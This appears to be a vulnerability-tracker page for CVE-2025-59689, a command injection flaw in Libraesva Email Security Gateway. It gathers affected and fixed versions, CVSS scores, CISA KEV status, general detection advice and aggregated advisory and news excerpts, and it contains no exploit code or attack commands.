CVE-2025-59689
published 2025-09-19CVE-2025-59689: Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For…
PriorityP181medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
KEVITW
CISA Known Exploited Vulnerabilitydue 2025-10-20
Exploited in the wild
EPSS
1.93%
77.4th percentile
Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For ESG 5.1 a fix has been released in 5.1.20. For ESG 5.2 a fix has been released in 5.2.31. For ESG 5.4 a fix has been released in 5.4.8. For ESG 5.5. a fix has been released in 5.5.7.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| libraesva | email_security_gateway | >= 4.5 < 5.0.31 | 5.0.31 |
| libraesva | email_security_gateway | >= 5.1 < 5.1.20 | 5.1.20 |
| libraesva | email_security_gateway | >= 5.1.0 < 5.1.20 | 5.1.20 |
| libraesva | email_security_gateway | >= 5.2 < 5.2.31 | 5.2.31 |
| libraesva | email_security_gateway | >= 5.2.0 < 5.2.31 | 5.2.31 |
| libraesva | email_security_gateway | >= 5.3 < 5.4.8 | 5.4.8 |
| libraesva | email_security_gateway | >= 5.3.0 < 5.3.16 | 5.3.16 |
| libraesva | email_security_gateway | >= 5.4.0 < 5.4.8 | 5.4.8 |
| libraesva | email_security_gateway | >= 5.5 < 5.5.7 | 5.5.7 |
| libraesva | email_security_gateway | >= 5.5.0 < 5.5.7 | 5.5.7 |
Detection & IOCsextracted from sources · hover to see the quote
- →Trigger vector is a maliciously crafted compressed email attachment — monitor for inbound emails with compressed archive attachments (e.g., ZIP, TAR, etc.) being processed by Libraesva ESG, especially those resulting in unexpected process spawning from the ESG mail-processing service. ↗
- →Root cause is improper sanitization during active-code removal from files inside compressed archives — look for anomalous child process execution (e.g., shell spawning) from Libraesva ESG mail-processing components. ↗
- →Commands execute as a non-privileged user — on ESG appliances, alert on unexpected shell commands or process trees spawned under non-root/non-admin service accounts associated with email processing. ↗
- →The vendor's patch includes an automated IOC scan — use the self-assessment module shipped with the emergency update to verify whether the environment has already been breached. ↗
- ·The emergency patch was deployed automatically to both cloud and on-premise deployments — verify patch application using the vendor's self-assessment module, as automatic deployment does not guarantee successful application. ↗
- ·CISA KEV remediation deadline is 2025-10-20; vendor advisory and full details available at the official Libraesva knowledge base URL. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck6.1MEDIUM
cisa6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Libraesva Email Security Gateway Command Injection Vulnerability
cisa·2025-09-29·CVSS 6.1
CVE-2025-59689 [MEDIUM] CWE-77 Libraesva Email Security Gateway Command Injection Vulnerability
Vulnerability: Libraesva Email Security Gateway Command Injection Vulnerability
Affected: Libraesva Email Security Gateway
Libraesva Email Security Gateway (ESG) contains a command injection vulnerability which allows command injection via a compressed e-mail attachment.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://docs.libraesva.com/knowledgebase/security-advisory-command-injection-vulnerability-cve-2025-59689/ ; https://nvd.nist.gov/vuln/detail/CVE-2025-59689
Remediation Due Date: 2025-10-20
GHSA
GHSA-363h-22w6-hcrm: Libraesva ESG 4
ghsa_unreviewed·2025-09-19
CVE-2025-59689 [MEDIUM] CWE-77 GHSA-363h-22w6-hcrm: Libraesva ESG 4
Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For ESG 5.1 a fix has been released in 5.1.20. For ESG 5.2 a fix has been released in 5.2.31. For ESG 5.4 a fix has been released in 5.4.8. For ESG 5.5. a fix has been released in 5.5.7.
VulnCheck
Libraesva Email Security Gateway Command Injection Vulnerability
vulncheck·2025·CVSS 6.1
CVE-2025-59689 [MEDIUM] CWE-77 Libraesva Email Security Gateway Command Injection Vulnerability
Libraesva Email Security Gateway Command Injection Vulnerability
Libraesva Email Security Gateway (ESG) contains a command injection vulnerability which allows command injection via a compressed e-mail attachment.
Affected: Libraesva Email Security Gateway
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://docs.libraesva.com/knowledgebase/security-advisory-command-injection-vulnerability-cve-2025-59689/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://hs-8813571.f.hubspotemail.net/hubfs/8813571/PERISCOPE_VULNINTEL_20251007.pdf; https://www.rapid7.com/cdn/assets/bltbd2f1cd70f9e3e7
No detection rules found.
No public exploits indexed.
Bleepingcomputer
Libraesva ESG issues emergency fix for bug exploited by state hackers
blogs_bleepingcomputer·2025-09-23·CVSS 6.1
[MEDIUM] Libraesva ESG issues emergency fix for bug exploited by state hackers
## Libraesva ESG issues emergency fix for bug exploited by state hackers
## Bill Toulas
Libraesva rolled out an emergency update for its Email Security Gateway (ESG) solution to fix a vulnerability exploited by threat actors believed to be state sponsored.
The email security product protects email systems from phishing, malware, spam, business email compromise, and spoofing, using a multi-layer protection architecture.
According to the vendor, Libraesva ESG is used by thousands of small and medium businesses as well as large enterprises worldwide, serving over 200,000 users .
The security issue, tracked under CVE-2025-59689 , received a medium-severity score. It is triggered by sending a maliciously crafted email attachment and allows executing arbitrary shell commands from a non-priv
Recorded Future
September 2025 CVE Landscape
blogs_recorded_future·CVSS 7.2
[HIGH] September 2025 CVE Landscape
# September 2025 CVE Landscape
In September 2025, Recorded Future’s Insikt Group® identified sixteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the eighteen identified in August, with the number of Very Critical vulnerabilities also decreasing (11) month over month.
These vulnerabilities have affected the following vendors: Sudo, Libraesva, Fortra, Cisco, Adminer, Google, Dassault Systèmes, Linux, Android, Sitecore, TP-Link, and Meta Platforms.
September was dominated by flaws in Cisco and TP-Link, which together represented six of the sixteen vulnerabilities. Cisco’s IOS, IOS XE, and Secure Firewall products were affected by flaws, including stack-based and classic buffer overflows (CWE-121, CWE-120) and missing authorization
Recorded Future
September 2025 CVE Landscape
blogs_recorded_future·CVSS 7.2
[HIGH] September 2025 CVE Landscape
## September 2025 CVE Landscape
In September 2025, Recorded Future’s Insikt Group® identified sixteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the eighteen identified in August, with the number of Very Critical vulnerabilities also decreasing (11) month over month.
These vulnerabilities have affected the following vendors: Sudo, Libraesva, Fortra, Cisco, Adminer, Google, Dassault Systèmes, Linux, Android, Sitecore, TP-Link, and Meta Platforms.
September was dominated by flaws in Cisco and TP-Link, which together represented six of the sixteen vulnerabilities. Cisco’s IOS, IOS XE, and Secure Firewall products were affected by flaws, including stack-based and classic buffer overflows (CWE-121, CWE-120) and missing authorizatio
2025-09-19
Published
2025-09-29
Added to CISA KEV
Exploited in the wild